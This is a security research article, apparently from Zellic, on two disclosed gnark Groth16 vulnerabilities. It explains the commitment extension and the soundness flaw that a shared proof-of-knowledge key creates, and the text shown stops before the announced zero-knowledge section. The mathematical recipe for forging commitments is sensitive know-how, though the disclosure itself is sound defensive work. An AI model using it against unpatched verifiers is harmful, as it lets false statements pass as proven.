Malte Leip

Two Vulnerabilities in gnark's Groth16 Proofs

An analysis of two vulnerabilities Zellic discovered that broke zero-knowledge and soundness of gnark’s Groth16 proofs with commitments

gnark is a popular zkSNARK library written in Go. One of two proving schemes offered by the gnark backend is a variant of the Groth16 scheme. This variant used by gnark is a modification of standard Groth16, extending it with commitments. In this article, we discuss two vulnerabilities that we found in this extension. The first breaks soundness and could allow a malicious prover to prove incorrect statements, whenever at least two commitments are used (CVE-2024-45039). The second breaks the zero-knowledge property of Groth16 proofs produced by gnark using commitments (CVE-2024-45040). In some cases, an attacker could use this vulnerability to recover private witnesses from a proof. We reported both vulnerabilities to the gnark team, and they have been fixed in version 0.11.0. Unless otherwise stated, the discussion below is based on gnark version 0.10.0.

This article will begin in the first two sections by introducing gnark and fixing notation as well as recalling the main components of the Groth16 proving system. In the third section, we then motivate and describe gnark’s extension to Groth16 involving commitments. Building from there, the fourth section explains the first of two vulnerabilities, the soundness one. Before explaining the second vulnerability in the sixth section, we take a step back and discuss commitment schemes and their security properties, particularly for Pedersen commitments. We provide some background on how we found the vulnerabilities as well as a timeline at the end.

What Is gnark?

In this section, we will introduce gnark and its components via an example, assuming the reader already has basic familiarity with what zero-knowledge proofs are. (If you need an introduction to that first, check out our earlier blog post on an introduction to zero-knowledge.)

Circuit Variables and Constraints

There are several parts involved in producing ZK proofs. The very first step is to define what it is we would like to prove. As an example, let us say we want to prove that a public natural number $N$ is not prime. Even more, we would like to prove that we actually know $1 < A, B$ such that $N = A \cdot B$. Given this specification, we then need to define a circuit consisting of circuit variables, which can be private witnesses or public instances, together with constraints that these circuit variables need to satisfy. Defining a circuit like this is functionality offered by gnark’s front end. Here is how this could look for our example so far:

```go
// Here we define which circuit variables our circuit will have.
type ExampleCircuit struct {
	A frontend.Variable // Private witness
	B frontend.Variable // Private witness
	N frontend.Variable `gnark:",public"` // Public instance
}
```

```go
// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
	api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
	api.AssertIsDifferent(circuit.A, 0) // A != 0
	api.AssertIsDifferent(circuit.A, 1) // A != 1
	api.AssertIsDifferent(circuit.B, 0) // B != 0
	api.AssertIsDifferent(circuit.B, 1) // B != 1
	return nil
}
```

We first defined three circuit variables $A$, $B$, and $N$, making $N$ public. By default, circuit variables in gnark are private witnesses. The function Define is then used to introduce constraints. In this case, we constrained $N = A \cdot B$ as well as ruled out that $A$ or $B$ is 0 or 1.

Arithmetic Modulo $p$

This is not enough to actually ensure our statement, however. While in our original statement $N$, $A$, and $B$ were natural numbers, in the circuit we are actually working with elements of a prime field, that is, integers modulo a prime $p$. The constraint we introduced only ensures that $N$ and $A \cdot B$ have the same remainder when reduced modulo $p$. So how do we deal with that? One way would be to constrain $A$ and $B$ to be small enough that their product can never be as large as $p$. For example, if we only plan to use this circuit for $N$ at most a 16-bit number, then correct $A$ and $B$ will also be at most 16 bits wide. The $p$ we will later use is a 254-bit number, so constraining $A$ and $B$ to be at most 16 bits wide ensures that no wraparound can happen on multiplication.

Range Checks

So how do we actually constrain $A$ and $B$ to be at most 16 bits wide? Checks like this are called range checks and are very common when writing circuits. Because of this, gnark’s standard library already contains an optimized implementation of range checks, which we can use without having to implement the logic ourselves:

```go
const bitnum = 16

// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
	api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
	api.AssertIsDifferent(circuit.A, 0) // A != 0
	api.AssertIsDifferent(circuit.A, 1) // A != 1
	api.AssertIsDifferent(circuit.B, 0) // B != 0
	api.AssertIsDifferent(circuit.B, 1) // B != 1
	rangeChecker := rangecheck.New(api)
	rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
	rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
	return nil
}
```

Proving Scheme

If we want to use gnark to produce proofs for this circuit, we first need to decide on the proving scheme and elliptic curve we would like to use. There are two proving schemes available: PlonK and (a variant of) Groth16. In this article, we only consider Groth16. There are also multiple curves available, and we choose the BN254 curve in our examples.

Running Setup, Prover, and Verifier

Before we can produce an actual Groth16 proof for the above circuit, we must first run the setup, producing a proving key and verification key. The proving key will then be used by the prover along with the public instances and private witnesses to produce the proof, and the verification key will be used by the verifier together with the public instances and the proof to verify whether the proof is valid. The code for this looks as follows:

```go
func main() {
	// Compiles our circuit into an R1CS constraint system
	var circuit ExampleCircuit
	ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit)

	// Groth16 setup, generating the proving key and verification key
	pk, vk, _ := groth16.Setup(ccs)

	// Witness definition
	assignment := ExampleCircuit{A: 3, B: 10, N: 30}
	witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField())
	publicInstances, _ := witness.Public()

	// Proving
	proof, _ := groth16.Prove(ccs, pk, witness)

	// Verifying
	groth16.Verify(proof, vk, publicInstances)
}
```

If we run this, we will get output like the following, showing the proof was successfully produced and verified:

```
19:32:11 INF compiling circuit
19:32:11 INF parsed circuit inputs nbPublic=1 nbSecret=2
19:32:11 INF building constraint builder nbConstraints=29
19:32:11 DBG constraint system solver done nbConstraints=29 took=0.698133
19:32:11 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=29 took=2.139242
19:32:11 DBG verifier done backend=groth16 curve=bn254 took=3.499106
```

The Zero-Knowledge Property

The zero-knowledge property means in this example that knowing only the public instance $N$ and the proof (as well as the verification and proving keys), it should be impossible to recover any knowledge about $A$ and $B$ apart from what is constrained in the circuit. In the example $N = 30$, there are six nontrivial divisors of $N$, namely $2, 3, 5, 6, 10$, and $15$. Possibilities for $(A, B)$ are thus $(2, 15), (3, 10), (5, 6), (6, 5), (10, 3)$, and $(15, 2)$. There should be no way to check which of these the prover actually used. As we will later see, a vulnerability in the extension to Groth16 that was used by gnark meant that this was violated and it was in fact possible to recover what $A$ and $B$ were (up to version 0.10.0, fixed in version 0.11.0).
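The six possibilities can be enumerated with a few lines of Go. The factorPairs helper below is purely illustrative and not part of gnark:

```go
package main

import "fmt"

// factorPairs returns all pairs (A, B) with 1 < A, B and A*B == n.
func factorPairs(n int) [][2]int {
	var pairs [][2]int
	for a := 2; a < n; a++ {
		if n%a == 0 && n/a > 1 {
			pairs = append(pairs, [2]int{a, n / a})
		}
	}
	return pairs
}

func main() {
	// For N = 30, any of these six assignments may have been used by
	// the prover; zero-knowledge means the proof reveals nothing
	// about which one.
	fmt.Println(factorPairs(30)) // [[2 15] [3 10] [5 6] [6 5] [10 3] [15 2]]
}
```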

Groth16 Proofs

Before we can discuss gnark’s extension to Groth16, we first briefly review how proofs for the original variant of Groth16 are constructed and verified. The Groth16 proving system was introduced in the paper “On the Size of Pairing-based Non-interactive Arguments” by Jens Groth, and the following summary closely follows section 3.2 of that paper.

For readers already familiar with the Groth16 proving system, the purpose of this section is mainly to fix notation and provide the relevant formulas that we will use throughout the article for reference. For readers who are not familiar with the details of Groth16, the main takeaways are the following:

  • The circuit variables are $a_1, \dots, a_m$, with $a_1, \dots, a_\ell$ the public inputs and $a_{\ell+1}, \dots, a_m$ the private witnesses.
  • Out of the constraints of the circuit, a black-box setup process spits out a bunch of elliptic curve points that we give names like $L_i$ or $\overline{\alpha}$. A list can be found in the table below.
  • A proof consists of three elliptic curve points $A$, $B'$, and $C$, and there are formulas for how they are to be calculated by the prover from the points obtained from the setup step and from some $h_i$ that we treat as a black box for the purpose of this article. Why the formulas for these three points look the way they do is not relevant for this article, but we state the formulas because we will modify them later, when discussing gnark’s extension.
  • There is an equation, given in the “Verifying” section below, that is checked by the verifier. The verifier accepts a proof if and only if the equation holds. Again, why this equation looks the way it does can be taken as given, but we state the equation as it will be modified later.
  • Soundness of the Groth16 proving system means that if this equation holds, then the prover must have known witnesses satisfying the circuit constraints.

Setup

There are three main parts that together make up the Groth16 proving system: the setup, the prover, and the verifier. The setup depends on the circuit and produces a proving key and a verifying key, where the former is used by the prover together with an assignment for the circuit variables to produce a proof, and the latter is used by the verifier together with the public instances to check validity of a proof.

The table below describes the data that make up the proving and verifying keys. We give both the notation used in the Groth16 paper as well as the notation used in the gnark source code. We also fix notation we will use below. In the group column, we specify which group the element belongs to, either $\mathbb{G}_1$ or $\mathbb{G}_2$. These two abelian groups are subgroups of elliptic curves and come together with a suitable pairing $e\colon \mathbb{G}_1 \times \mathbb{G}_2 \to \mathbb{G}_T$. For readers who would like an introduction, we have an earlier article introducing what elliptic curve pairings are. The precise ranges for $i$ in the various rows, how $u_i, v_i, w_i$ relate to the circuit, and so on are not relevant for our exposition, so we will not go into those questions. The interested reader can find the details in the Groth16 paper. The constant $\ell$ stands for the number of public instances. The notation $\left[x\right]_k$ refers to $x \cdot G_k$, where $x$ is an element of the scalar field and $G_k$ is a fixed generator of $\mathbb{G}_k$.

| | Group | Notation in this article | Notation in gnark | Notation in Groth16 |
|---|---|---|---|---|
| Proving key | $\mathbb{G}_1$ | $\overline{\alpha} = \left[\alpha\right]_1$ | G1.Alpha | $\left[\alpha\right]_1$ |
| | $\mathbb{G}_1$ | $\overline{\beta} = \left[\beta\right]_1$ | G1.Beta | $\left[\beta\right]_1$ |
| | $\mathbb{G}_1$ | $\overline{\delta} = \left[\delta\right]_1$ | G1.Delta | $\left[\delta\right]_1$ |
| | $\mathbb{G}_1$ | $A_i$ | G1.A[i] | $\left[u_i(x)\right]_1$ |
| | $\mathbb{G}_1$ | $B_i$ | G1.B[i] | $\left[v_i(x)\right]_1$ |
| | $\mathbb{G}_1$ | $Z_i$ | G1.Z[i] | $\left[\frac{x^i t(x)}{\delta}\right]_1$ |
| | $\mathbb{G}_1$ | $K_{i+\ell+1}$ | G1.K[i] | $\left[\frac{\beta u_{i+\ell+1}(x) + \alpha v_{i+\ell+1}(x) + w_{i+\ell+1}(x)}{\delta}\right]_1$ |
| | $\mathbb{G}_2$ | $\overline{\beta}' = \left[\beta\right]_2$ | G2.Beta | $\left[\beta\right]_2$ |
| | $\mathbb{G}_2$ | $\overline{\delta}' = \left[\delta\right]_2$ | G2.Delta | $\left[\delta\right]_2$ |
| | $\mathbb{G}_2$ | $B'_i$ | G2.B[i] | $\left[v_i(x)\right]_2$ |
| Verifying key | $\mathbb{G}_1$ | $\overline{\alpha} = \left[\alpha\right]_1$ | G1.Alpha | $\left[\alpha\right]_1$ |
| | $\mathbb{G}_1$ | $\overline{\beta} = \left[\beta\right]_1$ | G1.Beta | $\left[\beta\right]_1$ |
| | $\mathbb{G}_1$ | $\overline{\delta} = \left[\delta\right]_1$ | G1.Delta | $\left[\delta\right]_1$ |
| | $\mathbb{G}_1$ | $L_i$ | G1.K[i] | $\left[\frac{\beta u_i(x) + \alpha v_i(x) + w_i(x)}{\gamma}\right]_1$ |
| | $\mathbb{G}_2$ | $\overline{\beta}' = \left[\beta\right]_2$ | G2.Beta | $\left[\beta\right]_2$ |
| | $\mathbb{G}_2$ | $\overline{\delta}' = \left[\delta\right]_2$ | G2.Delta | $\left[\delta\right]_2$ |
| | $\mathbb{G}_2$ | $\overline{\gamma}' = \left[\gamma\right]_2$ | G2.Gamma | $\left[\gamma\right]_2$ |

Proving

The prover takes as input the proving key and an assignment for the circuit variables $\left(a_1, \dots, a_m\right)$. Here, $a_1$ through $a_\ell$ are the public instances and $a_{\ell+1}$ through $a_m$ are the private witnesses. To simplify notation, we also set $a_0 = 1$.

The prover then calculates three group elements (two in $\mathbb{G}_1$ and one in $\mathbb{G}_2$), which jointly make up the proof. Below we again compare notation for the elements that make up the proof.

| Group | Notation in this article | Notation in gnark | Notation in Groth16 |
|---|---|---|---|
| $\mathbb{G}_1$ | $A$ | Ar | $\left[A\right]_1$ |
| $\mathbb{G}_2$ | $B'$ | Bs | $\left[B\right]_2$ |
| $\mathbb{G}_1$ | $C$ | Krs | $\left[C\right]_1$ |

To calculate $A$, $B'$, and $C$, the prover will first sample random elements $r$ and $s$ of the scalar field and calculate certain elements $h_i$. (The details of this are not relevant for this article.) The proof points are then obtained as follows ($n$ can be thought of as the number of constraints in the circuit).

\begin{align*} A &= \overline{\alpha} + \sum_{i=0}^{m} a_i \cdot A_i + r\cdot \overline{\delta} \\ B &= \overline{\beta} + \sum_{i=0}^{m} a_i \cdot B_i + s\cdot \overline{\delta} \\ B' &= \overline{\beta}' + \sum_{i=0}^{m} a_i \cdot B'_i + s\cdot \overline{\delta}' \\ C &= \sum_{i=\ell + 1}^{m} a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \end{align*}

Verifying

To verify a proof $\left(A, B', C\right)$ for public instances $\left(a_1, \dots, a_\ell\right)$, the verifier checks whether the following equality holds.

\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C, \overline{\delta}'\right) \end{equation*}

gnark’s Extension to Groth16 Proofs

In this section, we will motivate and discuss the extension to Groth16 that is used by gnark.

Random Linear Combinations and the Schwartz-Zippel Lemma

To motivate the extension, let us first take a step back and consider a generic problem. In many situations where a prover wants to convince a verifier of some statements, this involves claims that a number of equalities $f_i = g_i$ hold (where $f_i$ and $g_i$ are elements of some finite field $\mathbb{F}_p$ and $0 \leq i < k$). One way to check all equations at once is to check a random linear combination instead. If $r_i$ are random elements of $\mathbb{F}_p$, then $f_i = g_i$ for all $i$ implies that $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$. On the other hand, if there is a $j$ such that $f_j \neq g_j$, then only one in $p$ of the tuples $\left(r_0, \dots, r_{k-1}\right)$ will satisfy $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$.1 Thus, as long as the values $r_i$ are chosen uniformly at random and independently of the $f_i$ and $g_i$, the equality $\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i$ can be taken to be very strong evidence that $f_i = g_i$ for all $i$.

In some situations, calculating the sums on both sides might be cheap, but each equality check is expensive, so paying for the reduction from $k$ equality checks to a single one with the calculation of the two linear combinations can be an improvement.

A variant of the above method is often used in practice. We can interpret the elements $f_i$ and $g_i$ as the coefficients of polynomials $f$ and $g$ of degree less than $k$. What we would like to show is that $f = g$, or equivalently $f - g = 0$. As $f - g$ is a polynomial of degree less than $k$, it must either be the zero polynomial or have fewer than $k$ different roots. The probability of a random element $\tau$ being a root of $f - g$, assuming that $f - g \neq 0$, is thus at most $k/p$, so tiny if $p$ is large compared to $k$. This statement (generalized to the multivariate case) is known as the Schwartz-Zippel lemma. The upshot is that if $f$ and $g$ evaluate to the same element on a random input $\tau$, then this can be taken as strong evidence for $f = g$. This is similar to the random linear combination check we discussed before, now using $r_i = \tau^i$.

Note that if $\tau$ can be chosen by the prover, then they could just calculate a root of $f - g$, so this would be insecure. Similarly, if $\tau$ is chosen randomly by the verifier, but the prover knows $\tau$ before deciding on $f_i$ and $g_i$, they could cheat by, for example, setting $f_0 = \sum_{i=0}^{k-1} g_i \cdot \tau^i - \sum_{i=1}^{k-1} f_i \cdot \tau^i$.

The discussed technique is very widely used, and in fact, the Groth16 proof scheme itself uses it. Looking at the “Notation in Groth16” column in the table for the verification and proving keys above, $x$ plays the role of the random input, and $u_i$ and so on are polynomials related to the circuit’s constraints, which get evaluated at $x$ in order to construct the proving and verifying keys. The proof essentially consists of points obtained by evaluating three polynomials at $x$. The argument for why the verifier’s single equality check implies all constraints is precisely the argument that a polynomial of low degree evaluating to zero at a random point $x$ implies with high probability that the polynomial was already zero.

In Groth16’s case, the value of $x$ is not allowed to be known to the prover, as otherwise the system would be insecure, as previously discussed. Thus, the necessary values derived from $x$ are essentially hidden behind the elliptic curve discrete logarithm problem. (Knowing, for example, $u_i(x) \cdot G_1$ and $G_1$, with $G_1 \in \mathbb{G}_1$, it should be computationally infeasible to calculate $u_i(x)$.) While $x$ might be present during the setup process to calculate the proving and verifying keys, the value of $x$ is so-called toxic waste; it must be deleted to ensure no prover will know it. In practice, multiparty computation is used in the setup phase to ensure that no single party ever knows toxic-waste values such as $x$.

Given that this is such a useful technique in many places, we might want to use it within a circuit as well. However, we run into a problem here. How do we obtain a random value within the circuit at proving time? We certainly cannot let the prover choose it, as that would be insecure, and we want a noninteractive protocol, so there is no other party that could supply it. One thing we could do is to obtain $\tau$ as a hash of the $f_i$ and $g_i$. Given a hash function that can be modeled as a random oracle, this would be secure as well. The malicious prover could now try again if the $\tau$ they got is not a root, but as the new $\tau$ obtained after modifying some $f_i$ and/or $g_i$ will be random and unrelated to previously seen values, the best they can do is brute force.

This procedure allows us to use the technique of reducing checking many equalities to only checking one equality within circuits. However, we now have to compute a hash in circuit, which may be quite expensive itself. It would thus be very useful if a circuit variable could be somehow constrained to be a hash of some other circuit variables without actually having to add these constraints in circuit. This is exactly what the extension to Groth16 that is used by gnark does.

Splitting Out a Commitment

In order to have hashes of some circuit variables available in circuit, gnark allows the prover to commit to collections of circuit variables. These commitments are elements of $\mathbb{G}_1$, and hashes calculated from them are added as additional public inputs to the circuit. There can be more than one commitment, and each commitment can be to one or more circuit variables, both public instances and private witnesses. In the following, however, we will only describe the case where private witnesses are committed to, in order to simplify notation.

How would one design such a system? Merely committing to some values is easy, and there are many schemes that can be used to commit to values, such as the Pedersen commitment scheme, which we will discuss later in this article. So the prover could just, in addition to the normal Groth16 proof, also provide some commitments to some values. However, we do not want a Groth16 proof together with some unrelated commitments — we want the committed values to be the same values as the ones assigned to the circuit variables in the Groth16 proof. So there must be some linkage between the commitments and (the verification of) the Groth16 proof. This leads to the idea of splitting off, from one of the proof points, the summands involving the circuit variables that are to be committed to. This split-off point is then used as the commitment. But this point will also still need to be used in the verification equation, thereby linking it to the rest of the Groth16 proof.

Concretely, in the gnark extension, the commitment is removed from the CC proof point. This new point will then fill in for the missing part of CC in the proof verification. But as it is split off as a separate element, it can be used as input for hashing so that the verifier can compute that additional public input made up of the hashed commitment.

We will keep notation from before, so $\left(a_1, \dots, a_m\right)$ are the circuit variables, where $a_{\ell+1}$ through $a_m$ are the private witnesses. We assume we want to make $k$ commitments to pairwise disjoint subsets of the private witnesses. For this, we introduce indexing sets $\mathcal{J}_1, \dots, \mathcal{J}_k \subseteq \{\ell + 1, \dots, m\}$. So the $i$-th commitment should commit to the circuit variables $a_j$ for $j \in \mathcal{J}_i$. We also introduce notation for the set of indexes of all committed circuit variables, $\mathcal{J} \coloneqq \bigcup_{i=1}^{k} \mathcal{J}_i$. What we can now do is replace the proof point $C$ from vanilla Groth16 (for clarity, we will call the value this point has in vanilla Groth16 $C_{\mathrm{old}}$ below) by a modified $C_{\mathrm{new}}$ and add new points $D_1, \dots, D_k$ for the commitments.

\begin{align*} C_{\mathrm{old}} &= \sum_{i \in \{\ell+1, \dots, m\}} a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ C_{\mathrm{new}} &= \sum_{i \in \{\ell+1, \dots, m\} \setminus \mathcal{J}} a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ D_i &= \sum_{j \in \mathcal{J}_i} a_j\cdot K_j \end{align*}

Then the verifier can add the sum of the $D_i$ to $C_{\mathrm{new}}$ when checking the proof, so instead of

\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{old}}, \overline{\delta}'\right) \end{equation*}

the check will be

\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}} + \sum_{i=1}^k D_i, \overline{\delta}'\right) \end{equation*}

Now we have points $D_i$ available that depend on the circuit variables committed to for the $i$-th commitment. But the goal we outlined initially was to have in-circuit challenges depending on those committed circuit variables, so we need one more step. Let $\mathcal{H}$ be a hash function that maps points of $\mathbb{G}_1$ to $\mathbb{F}_p$. We can then use $\mathcal{H}$ to convert the commitment points to elements of $\mathbb{F}_p$, which we then use as public inputs to the circuit:

\begin{equation*} a_{\ell-k-1+i} \coloneqq \mathcal{H}(D_i) \end{equation*}

Now these circuit variables $a_{\ell-k-1+i}$ can be used in circuit as challenges that depend on the circuit variables committed to with $D_i$, for example in Schwartz-Zippel–style equality checks, as discussed above.

As is, there would be a big problem with this scheme, however: the verification does not depend on $C_{\mathrm{new}}$ and the $D_i$ individually, only on the sum $C_{\mathrm{new}} + \sum_{i=1}^k D_i$. A malicious prover could thus just replace the honest $D_i$ by arbitrarily chosen $D_i^{\mathrm{fake}}$ by setting $C_{\mathrm{new}}^{\mathrm{fake}} = C_{\mathrm{new}} + \sum_{i=1}^k D_i - \sum_{i=1}^k D_i^{\mathrm{fake}}$.

Preventing Fungibility of the Commitments Using Separate Proofs of Knowledge

So how could one prevent the kind of fungibility of the commitments that we just discussed?

The approach taken is to make the prover supply a proof of knowledge of coefficients $a_j$ for $j \in \mathcal{J}_i$ such that $D_i = \sum_{j \in \mathcal{J}_i} a_j \cdot K_j$. This would ensure that $D_i$ is not fully arbitrary but was constructed as a linear combination of the expected points. (We will explain later what such a proof of knowledge looks like.) This helps but isn’t enough; a malicious prover could still, for example, use $D_i = 0$ by just adding the relevant summands that should appear in the legitimate $D_i$ to $C_{\mathrm{new}}$ instead. So we would also have to require a proof of knowledge of the relevant coefficients for $C_{\mathrm{new}}$, ensuring that $C_{\mathrm{new}}$ was constructed as a linear combination of only the expected elliptic curve points.

There is one optimization we can make here so that proofs of knowledge are only needed for the $D_i$. Instead of pairing $D_i$ with $\overline{\delta}'$, grouping it with $C_{\mathrm{new}}$, we could pair $D_i$ with $\overline{\gamma}'$, grouping it with $\sum_{i=0}^{\ell} a_i \cdot L_i$. In this case, we do not need a proof of knowledge that $\sum_{i=0}^{\ell} a_i \cdot L_i$ is of this form, because it is the verifier itself that computes this linear combination, and so by construction, it will be a linear combination of only the points $L_i$ with $0 \leq i \leq \ell$. So we save one proof of knowledge. For this, we must slightly adjust $D_i$, however, so that we will have the following:

\begin{align*} D_i &= \frac{\delta}{\gamma} \cdot \left(\sum_{j \in \mathcal{J}_i} a_j\cdot K_j\right) = \sum_{j \in \mathcal{J}_i} a_j\cdot \left(\frac{\delta}{\gamma} \cdot K_j\right) \end{align*}

The prover should not know $\delta$, $\gamma$, or $\frac{\delta}{\gamma}$ of course, so the points $\frac{\delta}{\gamma} \cdot K_i$ will be part of the proving key. We actually already have notation that we can use for $\frac{\delta}{\gamma} \cdot K_i$, namely $L_i$. In a vanilla Groth16 proving key, $L_i$ does not appear, and the verification key has $L_j$ for $0 \leq j \leq \ell$. However, the formula for $L_i$ is precisely what $\frac{\delta}{\gamma} \cdot K_i$ is for $i > \ell$. Hence we can write $D_i$ as follows:

\begin{align*} D_i &= \sum_{j \in \mathcal{J}_i} a_j\cdot L_j \end{align*}

The verifier will now add the $D_i$ to the term from the public input when checking the proof, so it will check that

\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=1}^k D_i + \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}}, \overline{\delta}'\right) \end{equation*}

Assuming the protocol also includes proofs of knowledge for all $D_i$ as mentioned before, showing that the resulting protocol is sound likely boils down to an argument similar to Theorem 1 of the Groth16 paper.

The extension used by gnark uses this solution. One of the two vulnerabilities we report on in this article relates to the way that the proofs of knowledge were batched, and we will explain how the proofs of knowledge coming with the $D_i$ work in the next section, where we will also explain the vulnerability.

The Soundness Vulnerability

In this section, we discuss the soundness vulnerability present in gnark up to version 0.10.0 in cases where more than one commitment is used. We will begin by explaining what the proof of knowledge associated to an individual commitment looks like, then explain how these proofs can be batched, and finally discuss the even further compressed batched verification used by gnark up to version 0.10.0, which, however, resulted in a vulnerability.

Proofs of Knowledge of Coefficients of a Linear Combination

As explained before, we must require the prover to supply, together with $D_i$, a proof of knowledge of coefficients $(a_j)_{j \in \mathcal{J}_i}$ such that $D_i = \sum_{j \in \mathcal{J}_i} a_j \cdot L_j$. Such a proof of knowledge must be provided for $1 \leq i \leq k$. We will start by fixing $i$ and discussing how to construct a single such proof of knowledge.

This can be done as follows. During the setup phase, an additional toxic-waste field element $\sigma_i$ is sampled, and $\sigma_i \cdot L_j$ is added to the proving key for $j \in \mathcal{J}_i$. Furthermore, $[\sigma_i]_2 \in \mathbb{G}_2$ is added to the verification key. The prover now provides, together with $D_i$, also a point $P_i$ of $\mathbb{G}_1$, calculated as $P_i = \sum_{j \in \mathcal{J}_i} a_j \cdot (\sigma_i \cdot L_j)$. The verifier carries out the following check:

\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \end{equation*}

Why should the above equality convince the verifier that $D_i$ is of the form $D_i = \sum_{j \in \mathcal{J}_i} a_j \cdot L_j$? The idea is that a malicious prover could only have arranged this equality to hold if $P_i = \sigma_i \cdot D_i$, but as they do not know $\sigma_i$, the only way they could have managed this is by calculating $D_i$ as a linear combination of points for which multiplication by the scalar $\sigma_i$ is already known. But the only points of that form are $L_j$ for $j \in \mathcal{J}_i$.

Batching the Proofs of Knowledge

In the previous subsection, we discussed the kind of proof of knowledge needed for each commitment. Each of the verifications requires two pairings, however, which are quite expensive. So it would be good if verification of $k$ such proofs of knowledge could be done with fewer than $2k$ pairings.

This is actually exactly the kind of situation we discussed initially in this article when motivating why in-circuit random challenges and hence commitments are useful: to be able to use Schwartz-Zippel–style compressed equality checks. This is precisely one example where the equality check is expensive, as it involves computing pairings.

Compressing this check in Schwartz-Zippel style thus begins by generating a random challenge $r \in \mathbb{F}_p$. As this happens on the side of the verifier, they can just use a random number generator for this, if one is available. In contexts where the verifier cannot use randomness, one may use $r = \mathcal{H}(D_1, \dots, D_k, P_1, \dots, P_k)$. Then instead of verifying

e(Di,[σi]2)=?e(Pi,[1]2) for 1ik\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \text{ for } 1 \leq i \leq k \end{equation*}

the verifier can instead verify

i=1krk1e(Di,[σi]2)=?i=1krk1e(Pi,[1]2)\begin{equation*} \sum_{i=1}^k r^{k-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} \sum_{i=1}^k r^{k-1} e\left(P_i, [1]_2\right) \end{equation*}

So far nothing is won, as this still involves 2k2\cdot k pairings. However, the right-hand side can be rewritten to be calculated with a single pairing, using bilinearity of ee, which makes e(_,[1]2)e\left(\_, [1]_2\right) linear.

i=1krk1e(Pi,[1]2)=e(i=1krk1Pi,[1]2)\begin{equation*} \sum_{i=1}^k r^{k-1} e\left(P_i, [1]_2\right) = e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}

The upshot is that the verifier may verify the proofs of knowledge P1,,PkP_1, \dots, P_k by checking the following equality.

i=1krk1e(Di,[σi]2)=?e(i=1krk1Pi,[1]2)\begin{equation*} \sum_{i=1}^k r^{k-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}

This requires k+1k+1 pairings.

Proofs of Knowledge for Commitments in gnark up to Version 0.10.0

To compress the equality check we just arrived at even further, one would like to also use bilinearity on the left-hand side to move the sum into the inputs of the pairing, similarly to how it was done for the right-hand side. However, this is not possible, as neither of the two inputs is held constant across the sum, unless \sigma_i is independent of i.

Up to version 0.10.0, gnark thus in fact used the same \sigma_i = \sigma for each of the proofs of knowledge associated to the commitments. This meant that the verification could be compressed further, so that only two pairings were required:

\begin{equation*} e\left(\sum_{i=1}^k r^{i-1} D_i, [\sigma]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{i-1}P_i, [1]_2\right) \end{equation*}

The Soundness Vulnerability: Fungibility of Commitments

However, there is an issue with choosing the same \sigma for all the proofs of knowledge, as long as there is more than one. When we argued for why the verifier's check should convince them that D_i is of the form D_i = \sum_{j \in \mathcal{J}_i} a_j \cdot L_j, we used that the only points of \mathbb{G}_1 for which the prover also knows their product with \sigma_i were L_j for j \in \mathcal{J}_i. However, if \sigma_1 = \cdots = \sigma_k, then L_j is such a point for j \in \bigcup_{i=1}^{k} \mathcal{J}_i. Thus, the proofs of knowledge only convince the verifier that the prover knows a_{l, j} such that D_i = \sum_{l=1}^k \sum_{j \in \mathcal{J}_l} a_{l, j} \cdot L_j.

What does this mean in practice? Say there are k commitments as usual, and the correctly computed points would be D_1^{\mathrm{correct}}, \dots, D_k^{\mathrm{correct}}. Then a malicious prover could use D_1^{\mathrm{fake}}, \dots, D_k^{\mathrm{fake}} as commitments, where, for example, all but one of them (say all but D_k^{\mathrm{fake}}) are set to 0 \in \mathbb{G}_1, with the remaining commitment carrying the contributions missing from the others (so D_k^{\mathrm{fake}} = \sum_{i=1}^{k} D_i^{\mathrm{correct}}). Now for i < k, the challenge point \mathcal{H}(D_i^{\mathrm{fake}}) obtained in circuit from the commitment to circuit variables a_j for j \in \mathcal{J}_i no longer depends on the assignments of any circuit variables but stays fixed. But for most uses of such challenge points, such as when compressing checks using the Schwartz-Zippel lemma, the in-circuit logic will no longer be sound if the challenge point is not obtained as a random function of the committed-to circuit variables.

